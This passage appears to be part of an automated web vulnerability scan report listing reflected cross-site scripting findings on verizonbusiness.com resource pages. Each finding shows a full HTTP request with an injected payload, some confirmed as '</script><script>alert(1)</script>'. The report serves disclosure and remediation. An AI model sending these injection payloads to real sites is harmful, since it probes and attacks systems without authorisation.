Last-Modified: Wed, 17 Nov 2010 00:26:03 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources46cea";22920c2436d/1002a2a24-111-Virtualization.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.642. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a24-111-Virtualization.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93063'%3bdadd5304446 was submitted in the REST URL parameter 1. This input was echoed as 93063';dadd5304446 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources93063'%3bdadd5304446/1002a2a24-111-Virtualization.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:25 GMT
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources93063';dadd5304446/1002a2a24-111-Virtualization.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.643. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a24-111-Virtualization.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d8a1</script><script>alert(1)</script>698c18b1574 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a24-111-Virtualization.xml5d8a1</script><script>alert(1)</script>698c18b1574 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "5d09d4ff91955cf1ccf7064df760b756"
Last-Modified: Wed, 17 Nov 2010 00:28:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:28:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d603d0da1-a2fd-40bd-8a42-d64dfc77c84d|VTID%3d4af64dde-f5c9-48a9-88d0-965b1ee21562|SX%3d1289954896|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:32:00 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:28:17 GMT
Content-Length: 33651

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a2a24-111-Virtualization.xml5d8a1</script><script>alert(1)</script>698c18b1574</url>
...[SNIP]...

1.644. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a24-111-Virtualization.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8b6a'%3b3f1fa6957bd was submitted in the REST URL parameter 2. This input was echoed as c8b6a';3f1fa6957bd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c8b6a'%3b3f1fa6957bd HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/c8b6a';3f1fa6957bd'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.645. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a25-111-Teleworking.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25d66'%3b64e63c95fa6 was submitted in the REST URL parameter 1. This input was echoed as 25d66';64e63c95fa6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources25d66'%3b64e63c95fa6/1002a2a25-111-Teleworking.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:25:05 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:25:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:25:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources25d66';64e63c95fa6/1002a2a25-111-Teleworking.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.646. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a25-111-Teleworking.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4207"%3b8eea3dce6e3 was submitted in the REST URL parameter 1. This input was echoed as d4207";8eea3dce6e3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd4207"%3b8eea3dce6e3/1002a2a25-111-Teleworking.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesd4207";8eea3dce6e3/1002a2a25-111-Teleworking.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.647. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a25-111-Teleworking.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27a30</script><script>alert(1)</script>aa3a56b9f48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a25-111-Teleworking.xml27a30</script><script>alert(1)</script>aa3a56b9f48 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "9e57d9593727d102bfb5cd50ae5c5727"
Last-Modified: Wed, 17 Nov 2010 00:26:45 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d9c1229c9-e004-42a9-a53f-fd8eff439bfc|VTID%3d74edd7fc-8bdf-448a-aab7-1de8f33bfac7|SX%3d1289954805|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:29 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:45 GMT
Content-Length: 38077

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a25-111-Teleworking.xml27a30</script><script>alert(1)</script>aa3a56b9f48</url>
...[SNIP]...

1.648. http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a25-111-Teleworking.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be3b3'%3b44449288b0d was submitted in the REST URL parameter 2. This input was echoed as be3b3';44449288b0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/be3b3'%3b44449288b0d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/be3b3';44449288b0d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.649. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a26-111-Executive+Leadership+Series.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89f69'%3bc2d3e04a530 was submitted in the REST URL parameter 1. This input was echoed as 89f69';c2d3e04a530 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources89f69'%3bc2d3e04a530/1002a2a26-111-Executive+Leadership+Series.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40692
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources89f69';c2d3e04a530/1002a2a26-111-Executive+Leadership+Series.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.650. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a26-111-Executive+Leadership+Series.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b59e5"%3b9bddfedbb20 was submitted in the REST URL parameter 1. This input was echoed as b59e5";9bddfedbb20 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb59e5"%3b9bddfedbb20/1002a2a26-111-Executive+Leadership+Series.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40692
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb59e5";9bddfedbb20/1002a2a26-111-Executive+Leadership+Series.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDA
...[SNIP]...

1.651. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a26-111-Executive+Leadership+Series.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d635</script><script>alert(1)</script>95f4b5f9926 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a26-111-Executive+Leadership+Series.xml1d635</script><script>alert(1)</script>95f4b5f9926 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "884c83e5f12d578f1c253f962e47a4c8"
Last-Modified: Wed, 17 Nov 2010 00:22:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:37 GMT
Content-Length: 29400
Connection: close
Set-Cookie: BERT=VRID%3dfff09912-dae4-4956-8a89-3278989e5600|VTID%3df1be0dc1-2763-43b8-9db2-01f4c0454a18|SX%3d1289954556|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:26:20 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a26-111-Executive+Leadership+Series.xml1d635</script><script>alert(1)</script>95f4b5f9926</url>
...[SNIP]...

1.652. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a26-111-Executive+Leadership+Series.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac180'%3b332726deac6 was submitted in the REST URL parameter 2. This input was echoed as ac180';332726deac6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ac180'%3b332726deac6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:38 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:22:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ac180';332726deac6'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.653. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a27-111-Think+Forward.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b164c"%3b109e4ebe9eb was submitted in the REST URL parameter 1. This input was echoed as b164c";109e4ebe9eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb164c"%3b109e4ebe9eb/1002a2a27-111-Think+Forward.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:25:00 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:25:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:25:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb164c";109e4ebe9eb/1002a2a27-111-Think+Forward.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.654. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a27-111-Think+Forward.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1a91'%3b333c0dd493c was submitted in the REST URL parameter 1. This input was echoed as d1a91';333c0dd493c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd1a91'%3b333c0dd493c/1002a2a27-111-Think+Forward.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
